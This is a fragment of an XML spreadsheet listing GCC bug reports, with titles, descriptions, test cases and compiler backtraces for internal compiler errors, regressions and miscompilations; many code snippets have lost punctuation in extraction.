    <t>Illegal access to package-private class is allowed</t>
  </si>
  <si>
    <t>GCJ silently compiles an illegal access to a package-private
class in another package.
Here's the testcase:
------------------ Snafu.java -------------------------------
public class Snafu {
  public static void main( String[] args) {
    foo.Bar.hello( )
  }
}
-------------------------------------------------------------
------------------ foo/Bar.java -----------------------------
package foo
class Bar {
  public static void hello( ) { System.out.println( Hello!) }
}
-------------------------------------------------------------
Here's what JDK 1.4.2.03 on Linux says for this:
-------------------------------------------------------------
Snafu.java:3: foo.Bar is not public in foo cannot be accessed from outside pack
age
    foo.Bar.hello( )
       ^
Snafu.java:3: hello() in foo.Bar is not defined in a public class or interface
cannot be accessed from outside package
    foo.Bar.hello( )
           ^
2 errors
-------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-24901</t>
  </si>
  <si>
    <t>Misaligned data in fold_checksum_tree (--enable-checking=all)</t>
  </si>
  <si>
    <t>When compiling GCC on IA64 HP-UX with --enable-checking=all I get a bus error in fold_checksum_tree because of the variable 'buf'.  It is created as a char buffer but later cast to a tree struct.  On IA64 HP-UX with it's strict alignment requirements this results in a bus error because buf is not aligned to the same value as real structures.  We either need to add an alignment attribute to buf or alloc a real tree node instead of using buf.  The test case is to simply build GCC with --enable-checking=all on IA64 and then try to compile any program with the resulting GCC compiler.</t>
  </si>
  <si>
    <t>GCC-35400</t>
  </si>
  <si>
    <t>[4.4 Regression] -Wtype-limits -O2 causes ICE tree check: expected ssa_name have addr_expr in get_value_range at tree-vrp.c:469</t>
  </si>
  <si>
    <t>This is a regression probably introduced roughly three or four days ago
unless it's due to a change in the codebase I'm building (which is Wine):
...gcc -Wtype-limits -O2 action.i
action.c: In function 'move_files_wildcard':
action.c:5232: internal compiler error: tree check: expected ssa_name have addr_expr in get_value_range at tree-vrp.c:469</t>
  </si>
  <si>
    <t>GCC-49755</t>
  </si>
  <si>
    <t>ALLOCATE with STAT= produces invalid code for already allocated vars</t>
  </si>
  <si>
    <t>The Fortran standard states that ALLOCATEing an already allocated variable is an error.
gfortran nicely aborts with a run-time error if there is no STAT= variable. However if there is STAT= variable instead of just setting it and stopping gfortran deallocates the variable and then tries the new allocation.
There are several issues with that:
(a) It's invalid according to the Fortran standard which states in
    6.7.4 STAT= specifier:
    * each allocate-object that was not successfully allocated or
       deallocated shall retain its previous allocation status
       or pointer association status.
(b) It adds lots of code which should be most of the time not used
    increasing the code size and making optimizations more difficult
    especially for derived types with allocatable components
(c) With coarrays there are even more issues - one shall not simply
    free a coarray unilaterally!
Test case (except for the abort function valid Fortran 2008):
integer allocatable :: A(: :)
integer :: stat
allocate(A(2020))
A = 42
! Allocate of already allocated variable
allocate (A(55) stat=stat)
! Expected: Error stat and previous allocation status
if (stat == 0) call abort ()
if (any (shape (A) /= [20 20])) call abort ()
if (any (A /= 42)) call abort ()
end</t>
  </si>
  <si>
    <t>GCC-21687</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ICE in GC with local class inside a template function</t>
  </si>
  <si>
    <t>I know this goes against all the rules for filing bugs but when I supply -save-temps I don't get an ICE.
The code is the code from PR 21685 with one exception the following 2 lines are commented out (this 
makes this code valid):
              const value_iterator end = union_f(sets.begin() sets.end() 
output.begin()) 
It fails with 4.0.0 20050113
The ICE is:
t.cc: In member function 'void OKlib::SetAlgorithms::Test_Union::perform_test_trivial()':
t.cc:94: internal compiler error: tree check: expected statement_list have type_expr in 
finish_compound_stmt at cp/semantics.c:1113
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-21073</t>
  </si>
  <si>
    <t>Incorrect declaration of member variable in p3060d.C testcase</t>
  </si>
  <si>
    <t>Will attach patch.</t>
  </si>
  <si>
    <t>GCC-11834</t>
  </si>
  <si>
    <t>[3.4 regression] template specialization not matched</t>
  </si>
  <si>
    <t>Here's something I extracted from boost and which breaks my nightly
builds:
---------------------------------
template  struct tuple {
    typedef tuple tail
}
template  struct tuple {}
template 
struct length  {
    static const int i = length::i
}
template
struct length &gt; {
    static const int i = 0
}
template ::i&gt; struct M {}
template 
M &gt; foo (void (C::*)(A))
template 
M &gt; foo (void (C::*)(A) const)
struct S { void f(int) const }
void bar() {
  foo (
}
----------------------------------------
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c y.cc -ftemplate-depth-4
y.cc: In instantiation of `length::tail::tail::tail&gt;':
y.cc:9:   instantiated from `length::tail::tail&gt;'
y.cc:9:   instantiated from `length::tail&gt;'
y.cc:9:   instantiated from `length &gt;'
y.cc:31:   instantiated from here
y.cc:9: error: incomplete type `length&lt;typename
   tuple::tail::tail::tail::tail&gt;' used in nested name specifier
(Note that one should limit the template depth to avoid excessive screen
clutter and keep computing time reasonable.)
The error is entirely spurious: the return type of foo is 
M1&gt; where the second template argument of M is
deduced using length &gt;::i which should use the
specialization of length. Even if it didn't then the recusion
should hit the specialization in the next round but it doesn't.
Note that the bug goes mysteriously away if I remove either
of the two foo() functions. That doesn't make much sense since
only the second one should match the call in bar() anyway but
that's another bug which I reported a long time ago see PR 8271.
W.</t>
  </si>
  <si>
    <t>GCC-24061</t>
  </si>
  <si>
    <t>Documentation in /tr1/hashtable proposes possibly misleading change</t>
  </si>
  <si>
    <t>/tr1/hashtable lines 1318-132 documents hashtable::erase(const_iterator i)
It states: 
The return type should be const_iterator
and it should return the iterator following the one we've erased.
That would simplify range erase.
However if erase would return an iterator range-erase would not work the way
the comment suggests. The comment (probably) refers to code like the following
(attempting to erase values whose key is larger than 20):
for(typename T::iterator i = t.begin() i != t.end())
  if(i-&gt;first &gt; 20)
    i = t.erase(i) // (*)
  else
    ++i
This looks simple but it probably won't work. The line marked by (*) might
resize the container which will rehash/reposition all values. The iterator i
might point to values already accessed or might have skipped passt values not
yet accessed or both. tr1 is correct: t.erase(i) cannot return any meaningful
iterator.</t>
  </si>
  <si>
    <t>GCC-47551</t>
  </si>
  <si>
    <t>ICE when reloading neon registers from out-of-range offsets</t>
  </si>
  <si>
    <t>The ref_vldX.c test from:
http://gitorious.org/arm-neon-tests/arm-neon-tests
fails when compiled with -O0 -marm:
(insn 1817 1816 1818 2 /home/export/usr/gcc-linaro/H-x86_64-unknown-linux-gnu/bin/../lib/gcc/arm-linux-gnueabi/4.5.2/include/arm_neon.h:921
5 (parallel [
            (set (reg:CI 303 [ D.14795 ])
                (unspec:CI [
                        (mem:CI (reg:SI 3 r3 [1023]) [0 S48 A64])
                        (reg:CI 303 [ D.14795 ])
                        (unspec:V8HI [
                                (const_int 0 [0x0])
                            ] 191)
                    ] 106))
            (set (reg:SI 3 r3 [1023])
                (plus:SI (reg:SI 3 r3 [1023])
                    (const_int 24 [0x18])))
        ]) 1614 {neon_vld3qav8hi} (nil))
ref_vldX.c:157: confused by earlier errors bailing out
This is due to a bug in the ARM secondary_reload code.</t>
  </si>
  <si>
    <t>richard.sandiford</t>
  </si>
  <si>
    <t>GCC-48074</t>
  </si>
  <si>
    <t>[trans-mem] regular function used instead of clone in a transaction</t>
  </si>
  <si>
    <t>Created attachment 23631
not so big testcase.
In a relaxed transaction some functions (stl? template?) in an transaction doesn't call the clone version (not in an irrevocable mode: neither attribute doesGoIrrevocable nor ITM_changeTransactionMode).
You can verify this in the function stepDestroyBuildings (_ZL20stepDestroyBuildingsi) in Team.cpp (from glob2 kind of testcase attached) the function _ZNSt4listIP8BuildingSaIS1_EE5beginEv is called directly (not the clone no changeTransactionMode) even if in a transaction.
I had a quick look and the clone function exists but the call seems not be replaced. It seems to happen when one transaction is followed by another one (at least related).
Patrick Marlier.</t>
  </si>
  <si>
    <t>GCC-81530</t>
  </si>
  <si>
    <t>[8 Regression] ICE in add_stmt in gcc/cp/semantics.c:387</t>
  </si>
  <si>
    <t>After mine commit r249158 we ICE on:
$ cat /tmp/tmplyzssimb.ii
int a[(long) 4e20]
$ g++ -fsanitize=undefined /tmp/tmplyzssimb.ii
/tmp/tmplyzssimb.ii:1:18: error: overflow in constant expression
 int a[(long) 4e20]
                  ^
/tmp/tmplyzssimb.ii:1:18: internal compiler error: Segmentation fault
0xda25cf crash_signal
	../../gcc/toplev.c:338
0x80cb87 add_stmt(tree_node*)
	../../gcc/cp/semantics.c:387
0x6ba232 compute_array_index_type(tree_node* tree_node* int)
	../../gcc/cp/decl.c:9511
0x6bdd8e create_array_type_for_decl
	../../gcc/cp/decl.c:9634
0x6bdd8e grokdeclarator(cp_declarator const* cp_decl_specifier_seq* decl_context int tree_node**)
	../../gcc/cp/decl.c:10808
0x6c1ee6 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
	../../gcc/cp/decl.c:4903
0x77ce47 cp_parser_init_declarator
	../../gcc/cp/parser.c:19428
0x78445c cp_parser_simple_declaration
	../../gcc/cp/parser.c:12951
0x785355 cp_parser_block_declaration
	../../gcc/cp/parser.c:12776
0x789f94 cp_parser_declaration
	../../gcc/cp/parser.c:12674
0x78a3db cp_parser_declaration_seq_opt
	../../gcc/cp/parser.c:12550
0x78a6ea cp_parser_translation_unit
	../../gcc/cp/parser.c:4386
0x78a6ea c_parse_file()
	../../gcc/cp/parser.c:38644
0x8cf8d6 c_common_parse_file()
	../../gcc/c-family/c-opts.c:1104</t>
  </si>
  <si>
    <t>GCC-3104</t>
  </si>
  <si>
    <t>pre-processor does not search $includedir</t>
  </si>
  <si>
    <t>The pre-processor by default does not search $includedir aka
$prefix/include.  It does search /usr/include and /usr/local/include
so this is only for problem if gcc is configured with a non-default
--prefix - which many of us do!
Thia probably violates the GNU coding standards which say that packages
should install include files in $includedir.  One package which does this
is libjava.  Thus using gcj's CNI does not work (with default options)
if you use a non-standard --prefix.
Release:
3.0 20010608 (prerelease)
Environment:
System: Linux eureka.bothner.com 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/bothner/GNU/gcc3/configure --enable-threads --prefix=/home/bothner/GNU/install-gcc3 --enable-languages=C++java : (reconfigured)</t>
  </si>
  <si>
    <t>GCC-48377</t>
  </si>
  <si>
    <t>[4.6/4.7 regression] miscompilation at -O3</t>
  </si>
  <si>
    <t>Created attachment 23827
tarball containing preprocessed output valgrind warnings and object files
With GCC 4.6.0 I get a crash early in the startup of our system when compiling the system at â€“O3. This previously worked fine with GCC 4.5 and 4.4.5. Re-compiling only the top-most .cpp file in the crash's call stack with â€“O2 and re-linking fixes the crash. 
In the attached archive:
-console_urls.i in which
Console_url_table::Add_url_to_category() calls url_map-&gt;Put() which ends up calling Hashcode() and crashes on a dereference of the 'wordp' variable (*wordp++ &amp; 0xdfdfdfdf). gdb claims wordp has been optimized out when we debug the crash. 
-vg-* which is the valgrind (3.6.1 using the ubuntu natty package) output at each optimization level. I have been told that some of the warnings are false positives but the PPL and GMP ones I have never seen before. (For what it's worth I ran valgrind on 4.5.3 compiling the same file and it had nothing to report at all in GCC or related libraries.)
-build-cross-4.6.sh which is the script I used to generate the toolchain and contains package versions configure commandlines and build parameters for GCC and all the supporting libraries. I tried downgrading a few of the libraries to versions supplied in the sourceryg++ tarball but it didnâ€™t appear to fix the issue. The 4.5.3 I tested (which did not have this bug) was compiled with a similar script and with all the same library versions.
My commandline:
g++ -Wa-adlh=build_products/shared/x86_64/SOGS_native/release/gcc_v4.6.0/console_urls.s  -pipe -m64 -minline-all-stringops -fvisibility-inlines-hidden -ggdb -g3 -fpic -nostdinc -ftree-loop-linear -funroll-loops -march=opteron -Wa-mtune=opteron -Wchar-subscripts -Wreturn-type -Wunknown-pragmas -Wno-int-to-pointer-cast -Wformat -Wformat-nonliteral -Wformat-security -Wpointer-arith -Wcast-align -Wwrite-strings -Wsign-compare -Wunused-variable -Wunused-parameter -Wparentheses -fasynchronous-unwind-tables -fno-enforce-eh-specs -fcheck-new -O3 -fno-omit-frame-pointer -fno-strict-aliasing -fno-builtin-abort -fno-builtin-calloc -fno-builtin-exit -fno-builtin-free -fno-builtin-malloc -fno-builtin-realloc -fvisibility=default -fno-threadsafe-statics -Werror -I/home/matt/src/clueboat/porkius/main/src/include/libc -I/home/matt/src/clueboat/porkius/main/src/include/os -I/home/matt/src/clueboat/porkius/main/src/include/hal/x86_64 -I/home/matt/src/clueboat/porkius/main/src/include/hal -I/home/matt/src/clueboat/porkius/main/src/common/include -I/home/matt/src/clueboat/porkius/main/src/common/portability/shared/include -I/home/matt/src/clueboat/porkius/main/src/common/portability/shared/include -I/home/matt/src/clueboat/porkius/main/src/common/include -I/home/matt/src/clueboat/porkius/main/src/include/legacy -I/home/matt/src/clueboat/porkius/main/src/network/stack/sys -I/home/matt/src/clueboat/porkius/main/src/network/stack/local -I/home/matt/src/clueboat/porkius/main/src/network/stack/include -I../../monitoring -I/home/matt/src/clueboat/porkius/main/objects/SOGS_x86_64_release/autogen/management/ami/SOGS/dml/include -I/home/matt/src/clueboat/porkius/main/src/management/ami/SOGS/include -I/home/matt/src/clueboat/porkius/main/src/management/ami/shared/include -I/home/matt/src/clueboat/porkius/main/src/common/ami/dml/include -I/home/matt/src/clueboat/porkius/toolchain/linux/x86_64_host/gcc-cross/x86_64_target/v4.6.0/x86_64-iscb-SOGS/include/c++/4.6.0 -I/home/matt/src/clueboat/porkius/toolchain/linux/x86_64_host/gcc-cross/x86_64_target/v4.6.0/x86_64-iscb-SOGS/include/c++/4.6.0/x86_64-iscb-SOGS -DOPENSSL_FIPS -DSOGS_ANY -DSOGS_NATIVE -DSOGS_porkius -DSOGS_TARGET_NAME=x86_64   -DSOGS_SRC_ROOT=\/home/matt/src/clueboat/porkius/main/src/util/shared/\ -c -O3 /home/matt/src/clueboat/porkius/main/src/util/shared/console_urls.cpp -o /tmp/console_urls-O3.o
If thereâ€™s anything else you need from me to help debug/resolve this please let me know.</t>
  </si>
  <si>
    <t>GCC-60845</t>
  </si>
  <si>
    <t>print original type for typedef classes in diagnostics</t>
  </si>
  <si>
    <t>class A { }
typedef A B
void foo (B &amp;a) {
  a.x()
}
test.cc:4:5: error: â€˜Bâ€™ has no member named â€˜xâ€™
   a.x()
     ^
It would be nicer as:
test.cc:4:5: error: â€˜Bâ€™ {aka: 'A'} has no member named â€˜xâ€™
   a.x()
     ^</t>
  </si>
  <si>
    <t>GCC-53754</t>
  </si>
  <si>
    <t>[4.8 Regression][lto] ICE in lhd_decl_printable_name at langhooks.c:222 (with -g)</t>
  </si>
  <si>
    <t>as unrelated to PR53746 itself I open a new one:
please refer to PR53746  for the test case (even if I'm sure can be further reduced)
c++  -g  -fPIC -flto  -std=gnu++11 -msse3  CosmicClusterAlgo.ii -shared -o q.so
lto1: internal compiler error: in lhd_decl_printable_name at langhooks.c:222
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: c++ returned 1 exit status
/home/innocent/gccDir/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
w/o either -g or -flto works
c++ -v
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/home/innocent/gccDir/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../trunk/configure --prefix=/home/innocent/gccDir --enable-languages=cc++lto -enable-gold=yes --enable-lto -enable-libitm -disable-multilib --with-ppl --with-cloog : (reconfigured) ../trunk/configure --prefix=/home/innocent/gccDir --enable-languages=cc++lto -enable-gold=yes --enable-lto -enable-libitm -disable-multilib --with-ppl --with-cloog
Thread model: posix
gcc version 4.8.0 20120623 (experimental) [trunk revision 188906] (GCC) 
on fedora 17</t>
  </si>
  <si>
    <t>ccoutant</t>
  </si>
  <si>
    <t>GCC-31342</t>
  </si>
  <si>
    <t>testsuite i386/pic-1.c FAILed for warning -fPIC ignored</t>
  </si>
  <si>
    <t>This case issues the warning -fPIC ignored and is FAILed on account of it.</t>
  </si>
  <si>
    <t>GCC-6337</t>
  </si>
  <si>
    <t>Fails to distinguish between operator[](int) and operator T*().</t>
  </si>
  <si>
    <t>Try to compile the program will fail with because worst conversion for the former is better 
than worst conversion for the latter message.
Release:
gcc version 3.1 20020205 (Red Hat Linux Rawhide 3.1-0.21)
Environment:
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib</t>
  </si>
  <si>
    <t>schalkc</t>
  </si>
  <si>
    <t>GCC-14749</t>
  </si>
  <si>
    <t>[3.3 Regression] Miscompilation of bit test</t>
  </si>
  <si>
    <t>The following test case is miscompiled by GCC 3.3.3 and earlier 
at -O and higher:  
inline void bar (const int id) { if (id  }  
int main (void) { bar (0x00000001) return 0 }  
Apparently more or less by accident this problem was fixed on mainline with  
the following patches:   
2003-07-04  Jeff Law    
        PR c/11428  
        * expr.c (do_store_flag): Pass in the correct result type  
        when calling fold_single_bit_test.  
        * fold-const.c (fold_single_bit_test): Use result_type for the  
        result when folding a sign bit test.  
2003-07-02  Jeff Law    
        * expr.c (do_store_flag): Remove special case folding for  
        single bit tests.  Instead call back into the commonized folder  
        routine.  
        * fold-const.c (fold_single_bit_test): New function mostly  
        extracted from do_store_flag with an additional case extracted  
        from fold.  
        (fold): Call fold_single_bit_test appropriately.  
        * tree.h (fold_single_bit_test): Prototype.  
I'd like to backport those for 3.3.4.</t>
  </si>
  <si>
    <t>GCC-49210</t>
  </si>
  <si>
    <t>[4.7 regression] verify_gimple fails building ada/einfo.o at -O3</t>
  </si>
  <si>
    <t>The patch for bug 48989 regressed BUILD_CONFIG=bootstrap-O3 ada builds on i686- and x86_64-linux-gnu.  While building stage2 we hit this error:
../../gcc/ada/einfo.adb: In function â€˜Einfo.Is_String_Type.Partâ€™:
../../gcc/ada/einfo.adb:6377:4: error: invalid conversion in gimple call
boolean
einfo__b___XDLU_0__1
# .MEM_50 = VDEF 
iftmp.45_26 = einfo.is_string_type.part (id_1(D))
+===========================GNAT BUG DETECTED==============================+
| 4.7.0 20110528 (experimental) [trunk revision 8219ad7:2a33c3d:4b51a1cd8cb5f4ff6a659aa55ce963497a624bd3] (x86_64-pc-linux-gnu) GCC error:|
| verify_gimple failed                                                     |
| Error detected around ../../gcc/ada/einfo.adb:6377:4                     |</t>
  </si>
  <si>
    <t>GCC-78333</t>
  </si>
  <si>
    <t>[5 Regression] always-inline gnu-inline functions break -finstrument-functions</t>
  </si>
  <si>
    <t>When using option -finstrument-functions compiler-provided intrinsics cannot be used. Intrinsics are not functions so when the compiler tries to evaluate the address of them for the caller argument of __cyg_profile_func_{enterexit} the symbol cannot be resolved by the linker as the function doesn't actually exist.
A minimal test case is provided below:
/* gcc -std=c99 -finstrument-functions t.c */
#include 
void __cyg_profile_func_enter (void * void *) __attribute__((no_instrument_function))
void __cyg_profile_func_exit (void * void *) __attribute__((no_instrument_function))
void __cyg_profile_func_enter (void *a void *b) { }
void __cyg_profile_func_exit (void *a void *b) { }
int main() {
  volatile __m128 x = _mm_set1_ps(1.0f)
}
This code will only compile for hosts that support SSE. Though you can trigger
the same issue with any intrinsic header (AVX NEON AltiVec etc.)
One way to fix it would be to add the no_instrument_function attribute to all of the intrinsics. I think a more general solution should be applied i.e ignore generating the instrumentation when the function is an intrinsic.
I've tested on multiple versions of GCC and the bug appears to exist in both GCC 4 5 and 6.</t>
  </si>
  <si>
    <t>cube2killfield</t>
  </si>
  <si>
    <t>GCC-21984</t>
  </si>
  <si>
    <t>[4.1 regression] ICE in reload while compiling __mulxc3</t>
  </si>
  <si>
    <t>Starting program: /cvs/test/m68k/gcc/gcc/cc1 -fpreprocessed libgcc2.i -quiet 
-dumpbase libgcc2.c -auxbase-strip libgcc/./_mulxc3.o -g -O2 -W -Wall 
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes 
-Wold-style-definition -version -fPIC -fvisibility=hidden -o libgcc2.s 
GNU C version 4.1.0 20050609 (experimental) (m68k-linux) 
        compiled by GNU C version 4.0.1 20050603 (prerelease) (SUSE Linux). 
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096 
Compiler executable checksum: 80ebf056a47509c89d7f404fc943abab 
Breakpoint 1 fancy_abort (file=0x40000000008c3ee8 /cvs/gcc/gcc/reload1.c  
    line=1084 function=0x6000000000034320 reload) 
    at /cvs/gcc/gcc/diagnostic.c:588 
588       internal_error (in %s at %s:%d function trim_filename (file) 
line) 
(gdb) bt 
#0  fancy_abort (file=0x40000000008c3ee8 /cvs/gcc/gcc/reload1.c line=1084  
    function=0x6000000000034320 reload) at /cvs/gcc/gcc/diagnostic.c:588 
#1  0x40000000005d8a50 in reload (first=0x20000000006a1780 global=1) 
    at /cvs/gcc/gcc/reload1.c:1084 
#2  0x4000000000797930 in global_alloc (file=0x0) at /cvs/gcc/gcc/global.c:621 
#3  0x400000000068bb10 in rest_of_compilation () at /cvs/gcc/gcc/passes.c:486 
#4  0x400000000013adf0 in execute_pass_list (pass=0x600000000001e1b0) 
    at /cvs/gcc/gcc/tree-optimize.c:626 
#5  0x400000000013b870 in tree_rest_of_compilation (fndecl=0x20000000003f6150) 
    at /cvs/gcc/gcc/tree-optimize.c:796 
#6  0x4000000000030a40 in c_expand_body (fndecl=0x20000000003f6150) 
    at /cvs/gcc/gcc/c-decl.c:6597 
#7  0x40000000006da2d0 in cgraph_expand_function (node=0x20000000006738e0) 
    at /cvs/gcc/gcc/cgraphunit.c:967 
#8  0x40000000006de7a0 in cgraph_optimize () at /cvs/gcc/gcc/cgraphunit.c:1033 
#9  0x4000000000036930 in c_write_global_declarations () 
    at /cvs/gcc/gcc/c-decl.c:7571 
#10 0x4000000000625af0 in toplev_main (argc=  
    argv=) at /cvs/gcc/gcc/toplev.c:979 
#11 0x40000000000f8690 in main (argc=21 argv=0x60000fffffffa208) 
    at /cvs/gcc/gcc/main.c:35</t>
  </si>
  <si>
    <t>GCC-29699</t>
  </si>
  <si>
    <t>ICE in trans-decl.c</t>
  </si>
  <si>
    <t>The following program gives an ICE with todays 4.2-branch gfortran.
(I have to find out why gcc-trunk doesn't compile at the moment then I will check also gcc-trunk.)
I found the error with: ftp://ftp.nag.co.uk/sc22wg5/ISO_VARYING_STRING/
----------------
PROGRAM vocabulary_word_count
  IMPLICIT NONE
  TYPE VARYING_STRING
    CHARACTERDIMENSION(:)ALLOCATABLE :: chars
  ENDTYPE VARYING_STRING
  INTEGER :: list_size=200
CONTAINS
  SUBROUTINE extend_lists
    type(VARYING_STRING)DIMENSION(list_size) :: vocab_swap
  ENDSUBROUTINE extend_lists
ENDPROGRAM vocabulary_word_count
----------------
vocab.f95: In function 'extend_lists':
vocab.f95:9: internal compiler error: in gfc_get_symbol_decl at fortran/trans-decl.c:861</t>
  </si>
  <si>
    <t>GCC-59227</t>
  </si>
  <si>
    <t>[4.9 regression] FAIL: gfortran.dg/erf_3.F90  -O0  execution test</t>
  </si>
  <si>
    <t>$ gcc/gfortran -Bgcc/ -Bia64-suse-linux/./libgfortran/ ../gcc/testsuite/gfortran.dg/erf_3.F90 -fno-diagnostics-show-caret -fdiagnostics-color=never -O0 -fno-range-check -ffree-line-length-none -O0 -Bia64-suse-linux/./libgfortran/.libs -Lia64-suse-linux/./libgfortran/.libs -Bia64-suse-linux/./libquadmath/.libs -Lia64-suse-linux/./libquadmath/.libs -lm -o ./erf_3.exe
$ LD_LIBRARY_PATH=ia64-suse-linux/libgfortran/.libs:ia64-suse-linux/libquadmath/.libs ./erf_3.exe 
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   1.00000000000000000000000000000000000E+0000
   1.00000000000000000000000000000000000E+0000
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   0.00000000000000000000000000000000000      
   1.00000000000000000000000000000000000E+0000
   3.11594175678318376063235411046565406E+0955
Program aborted. Backtrace:
#0  0x200000000008084F
#1  0x200000000008477F
#2  0x20000000002665DF
#3  0x400000000000161F in check.850 at erf_3.F90:?
#4  0x4000000000001F3F in MAIN__ at erf_3.F90:?
Aborted</t>
  </si>
  <si>
    <t>GCC-9608</t>
  </si>
  <si>
    <t>compiled  VS gij virtual machine</t>
  </si>
  <si>
    <t>What would cause the failure of a static compiled java program that runs without errors in the gij virtual machine or when compiled dynamic? 
The compile process produces no errors and only warnings with -Wall. Two areas that are currently affecting the runtime are:
Exception in thread main java.lang.RuntimeException: The SHA algorithm was not found to use in computing the Serial Version UID for class Pyramid.Settings
When trying to write to disk.  And:
Exception in thread main class java.lang.ExceptionInInitializerError: java.util.MissingResourceException: Bundle gnu.java.locale.Calendar not found
This package does not seem to be in the gnu library. But why does it not fail in the VM but does when compiled static?
I ask this in a general manner because this is new to me and to give further details it would help to know what to look for if hunting a possible bug.
Release:
gcc 3.2.2 debian unstable package
Environment:
Linux Debian Potato 2.2 i586 200 mmx</t>
  </si>
  <si>
    <t>doparsons</t>
  </si>
  <si>
    <t>GCC-33029</t>
  </si>
  <si>
    <t>[4.3 Regression] libgcc2.c:1890: internal compiler error: in local_cprop_pass at gcse.c:3236</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./gcc/xgcc -B/test/gnu/gcc/objdir/./gcc/ -B/opt/gnu64/gcc/g
cc-4.3.0/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11
/lib/ -isystem /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/include -isystem /op
t/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/sys-include -g -fkeep-inline-functions
 -O2  -O2 -g -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmis
sing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -Dpa64=1 -DELF
=1 -mlong-calls -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -
I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gc
c/libgcc/../gcc -I../../../gcc/libgcc/../include  -DHAVE_CC_TLS -o _multc3.o -MT
 _multc3.o -MD -MP -MF _multc3.dep -DL_multc3 -c ../../../gcc/libgcc/../gcc/libg
cc2.c \
          -fvisibility=hidden -DHIDE_EXPORTS
../../../gcc/libgcc/../gcc/libgcc2.c: In function '__multc3':
../../../gcc/libgcc/../gcc/libgcc2.c:1890: internal compiler error: in local_cpr
op_pass at gcse.c:3236
This is in stage1.  Last revision known to build was 127133.
 __multc3
Analyzing compilation unit
Performing interprocedural optimizations
      Assembling functions:
 __multc3
Breakpoint 1 local_cprop_pass (alter_jumps=1 '\001')
    at ../../gcc/gcc/gcse.c:3236
3236          gcc_assert (libcall_sp == 
(gdb) bt
#0  local_cprop_pass (alter_jumps=1 '\001') at ../../gcc/gcc/gcse.c:3236
#1  0x40000000003df728 in one_cprop_pass (pass=2 cprop_jumps=1 '\001'
    bypass_jumps=1 '\001') at ../../gcc/gcc/gcse.c:3408
#2  0x40000000003d5270 in gcse_main (f=0x0) at ../../gcc/gcc/gcse.c:796
#3  0x40000000003ec020 in rest_of_handle_gcse () at ../../gcc/gcc/gcse.c:6696
#4  0x400000000047a640 in execute_one_pass (pass=0x80000001000027c8)
    at ../../gcc/gcc/passes.c:1119
#5  0x400000000047a968 in execute_pass_list (pass=0x80000001000027c8)
    at ../../gcc/gcc/passes.c:1172
#6  0x400000000047a9ac in execute_pass_list (pass=0x8000000100002a08)
    at ../../gcc/gcc/passes.c:1173
#7  0x400000000062434c in tree_rest_of_compilation (fndecl=0x800003fffde65400)
    at ../../gcc/gcc/tree-optimize.c:405
#8  0x40000000001b924c in c_expand_body (fndecl=0x0)
    at ../../gcc/gcc/c-common.c:4334
#9  0x40000000007fbab4 in cgraph_expand_function (node=0x800003fffdb17c00)
    at ../../gcc/gcc/cgraphunit.c:1077
#10 0x40000000007fbe18 in cgraph_expand_all_functions ()
    at ../../gcc/gcc/cgraphunit.c:1146
#11 0x40000000007fc9b0 in cgraph_optimize ()
    at ../../gcc/gcc/cgraphunit.c:1353
#12 0x400000000015fc78 in c_write_global_declarations ()
    at ../../gcc/gcc/c-decl.c:7897
---Type  to continue or q  to quit---
#13 0x40000000005a00a8 in compile_file () at ../../gcc/gcc/toplev.c:1056
#14 0x40000000005a3824 in do_compile () at ../../gcc/gcc/toplev.c:2150
#15 0x40000000005a3940 in toplev_main (argc=60 argv=0x800003fffdff0848)
    at ../../gcc/gcc/toplev.c:2182
#16 0x40000000002056b8 in main (argc=0 argv=0x0) at ../../gcc/gcc/main.c:35
(gdb) c
Continuing.
../../../gcc/libgcc/../gcc/libgcc2.c: In function '__multc3':
../../../gcc/libgcc/../gcc/libgcc2.c:1890: internal compiler error: in local_cprop_pass at gcse.c:3236</t>
  </si>
  <si>
    <t>GCC-34875</t>
  </si>
  <si>
    <t>read into vector-valued section doesn't transfer any values</t>
  </si>
  <si>
    <t>With compiler
4.3.0 20080109 (experimental) [trunk revision 131426] (GCC)
vector valued reads into an array don't appear to read in values.
The test program prints out
 kind of qda =            4
 vector valued read failed
           1 -100.000000      1.00000000
           2 -100.000000       2.0000000
           3 -100.000000       3.0000000
           4 -100.000000       4.0000000
           5 -100.000000       5.0000000
           6 -100.000000       6.0000000
           7 -100.000000       7.0000000
           8 -100.000000       8.0000000
           9 -100.000000       9.0000000
          10 -100.000000      10.0000000
 subscript range read succeeded
Dick Hendrickson
